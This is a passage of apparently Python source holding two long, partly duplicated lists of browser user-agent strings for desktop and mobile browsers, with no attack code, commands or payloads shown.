'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2', 'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0', 'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0', 'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN', 'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN']
useragent = [
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1', 'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5', 'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20', 'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2', 'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1', 'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2', 'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0', 'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
